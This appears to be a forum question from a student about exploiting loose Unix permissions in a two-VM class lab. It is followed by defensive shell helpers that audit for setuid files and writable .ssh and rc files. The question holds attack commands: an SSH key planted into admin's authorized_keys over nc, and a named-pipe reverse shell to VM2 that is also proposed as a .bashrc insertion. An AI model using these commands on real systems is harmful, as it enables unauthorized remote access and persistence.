I have a couple of VMs as part of a class I'm taking; I'm just trying to understand how loose permissions (other than the obvious 777) can be taken advantage of.
The targeted account on VM1 is admin. He's a regular user with sudo access to most commands and files. On VM1 there is also a regular unprivileged user called intruder. Attacks are being launched from VM2.
On VM2 (as root; assume it's a machine owned by intruder) I tried:
cat > command
echo "ssh-rsa blablabla...== root@VM2.mynetwork.net" | cat > /home/admin/.ssh/authorized_keys
nc -l VM1.mynetwork.net 14567 < commands
On VM1: I couldn't figure out how to exploit a regular 755 directory, so I skipped that part and pretended something had already happened, and a copy of /bin/sh is placed in /tmp with permissions 4755 (by a script run by admin).
As intruder I set up a named pipe in /tmp called mypipe. As intruder I ran:
/tmp/sh 0</tmp/mypipe | nc VM2.mynetwork.net 14567 >/tmp/mypipe
Which gives me a permission denied error. The shell itself seems pretty bad, but I don't understand how it could be used (except by intruder if he was logged in).
So if somehow intruder snuck in and somehow inserted into .bashrc or .bash_login:
mkfifo /tmp/mypipe
/bin/sh 0</tmp/mypipe | nc -l VM2.mynetwork.net 14567 >/tmp/mypipe
How could this be exploited?
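From the defender's side, the two conditions the post describes (a setuid copy of a shell sitting in a world-writable directory, and a user's .ssh or shell rc files being writable by someone other than the owner) are both cheap to audit. The following POSIX sh helpers are an added example written for this page, not something from the original post or the class; they assume GNU stat (with a BSD stat fallback) and are meant to be run periodically by root or from a cron job.

```shell
#!/bin/sh
# Audit helpers (added example, not from the original post).

# find_setuid DIR
#   List regular files under DIR that carry the setuid bit (mode 4xxx).
#   A setuid shell in /tmp, as in the scenario above, shows up here.
find_setuid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# check_ssh_dir HOME_DIR
#   Check that the home directory, ~/.ssh, authorized_keys and the shell
#   rc files are not writable by group or other. If another local user can
#   write to any of these, they can plant keys or commands for that account.
#   Prints "ok" or one "loose: PATH mode MODE" line per problem; returns 1
#   if anything is loose, 0 otherwise.
check_ssh_dir() {
    home="$1"
    rc=0
    for p in "$home" "$home/.ssh" "$home/.ssh/authorized_keys" \
             "$home/.bashrc" "$home/.bash_login" "$home/.profile"; do
        [ -e "$p" ] || continue
        # GNU stat prints the octal mode with %a; BSD stat uses -f '%Lp'.
        mode=$(stat -c '%a' "$p" 2>/dev/null || stat -f '%Lp' "$p")
        # Leading 0 forces octal in shell arithmetic; 022 = group+other write.
        if [ $(( 0$mode & 022 )) -ne 0 ]; then
            echo "loose: $p mode $mode"
            rc=1
        fi
    done
    [ "$rc" -eq 0 ] && echo "ok"
    return "$rc"
}

# Typical invocation (constructed usage, adjust the home path):
#   find_setuid /tmp
#   check_ssh_dir /home/admin
```

Running find_setuid over /tmp, /var/tmp and /dev/shm on a schedule and alerting on any hit is a simple detection for the "copy of /bin/sh with 4755" step; check_ssh_dir catches the writable .bashrc/.bash_login/authorized_keys conditions that the second half of the post relies on.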